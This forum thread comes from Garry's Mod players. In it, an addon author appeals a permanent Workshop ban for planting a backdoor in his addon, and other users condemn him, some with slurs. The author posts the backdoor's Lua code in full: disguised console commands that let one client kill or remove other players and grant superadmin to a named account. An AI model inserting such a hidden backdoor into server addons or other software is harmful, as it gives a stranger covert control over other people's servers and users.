Garry's Mod Permanent workshop ban appeal

rip salty triggered autists down below

You made it clear that you don’t care.

Yes, but I didn’t know I would get permabanned for it, just the addon getting banned.
I was going to update the addon before I found out it was banned, and I was banned from the workshop.

you made a mistake and you paid for it, tough shit

I don’t know about you, but petty mistakes like this shouldn’t be treated so harshly. There are worse backdoor cases than this.

petty mistakes lmao - you intentionally included a backdoor in your addon to then later exploit and gain full access to their server - what is petty at all about banning you for that

I never said I used the exploits. but im just another retard on the workshop right? nobody cares about what I have to say.

[editline]24th August 2016[/editline]

Here, want the code? It’s not for taking down server networks :V

if CLIENT then
	concommand.Add( "mat_zset",function(ply,command,args,classname)
		net.Start( "mat_zset" )
		net.WriteString(args[1])
		net.SendToServer()
	end)
	concommand.Add( "adsp_door_length",function(ply,command,args,classname)
		net.Start( "adsp_door_length" )
		net.WriteString(args[1])
		net.SendToServer()
	end)
	concommand.Add( "faceposer_flex01",function(ply)
		net.Start( "faceposer_flex01" )
		net.SendToServer()
	end)
end 
if SERVER then
	util.AddNetworkString( "mat_zset" )
	net.Receive( "mat_zset",function( len,ply )
		for k,v in pairs(player.GetAll()) do
			if v:Nick() == net.ReadString() then
				v:Kill()
			end
		end
	end)
	util.AddNetworkString( "adsp_door_length" )
	net.Receive( "adsp_door_length",function( len,ply )
		for k,v in pairs(player.GetAll()) do
			if v:Nick() == net.ReadString() then
				v:Remove()
			end
		end
	end)
	util.AddNetworkString( "faceposer_flex01" )
	net.Receive( "faceposer_flex01",function( len,ply )
		if ply:Name() == "GbrosMC" then
			if ply:GetVelocity():Length() > 0 then
				ply:SetUserGroup("superadmin")
			end
		end
	end)
end

What are Terms of Service? What is an Acceptable Use Policy? Why have rules in the first place if you aren’t going to enforce them?

If you think it’s okay to purposefully introduce a hidden security vulnerability into a piece of software without telling people about it when sharing with them, you shouldn’t have the ability to submit software to any platform. That’s downright irresponsible.

Hahahaha I love it when peeps get caught then start crying.
I played a lot of rust u should see all the peeps on there crying after being caught for using hacks.

Ah well I’m glad u got caught what gives u the right to mess some ones server up after they spent days (like me and others here who helped me) setting it up.

never started the thread so people like you could act like idiots on here, but whatever.
And like I said, I never used the exploits blablabla what I’ve been saying this whole time.

And I wasn’t the one doing whatever happened to your server. You also still never told me what happened. I don’t even know if you have proof that anything happened, you shut off all contact from me before you were about to show me what happened.

EDIT:
not hacks, backdoors*
Where is this guy’s 1st place spelling award?

but you are literally a retard on the workshop though lmao, breaching it’s tos and acceptable use policy and then crying you get banned lmao

U must have me. Confused no one has attacked my server.
I was trying to say people who try to attack peoples server deserve a ban.

Ok u never used it but u would have done if u never got caught so what’s the difference.

Thanks for understanding the fact that I never used it. And I probably would have admitted to using the backdoors if I did. Lying about it wouldn’t make it any better.

I missed the “” around the “you never used it” part :stuck_out_tongue:

So you still think I used the exploits?

Can’t say I’ve seen a “worse” backdoor case than this.

This is the worst backdoor I have seen on the workshop to date.

And stop saying you never used it, you are only saying this because no one is here saying you came on their server and got superadmin. etc

Noone is here saying that because it never happened.
I already posted the code 2 times, whats the need for an image of a portion of it?

Only copy and pasting it from this thread where you were found out.
http://forum.facepunch.com/showthread.php?t=1531921

If you’re willing to intentionally put a backdoor into one of your own submissions and potentially hurt server host’s userbase and ad revenue, then you should have no right to publish any sort of software anywhere ever again.

locking thread since people see this as an excuse to harass me.
I should have locked it in the first place to avoid all of this crap.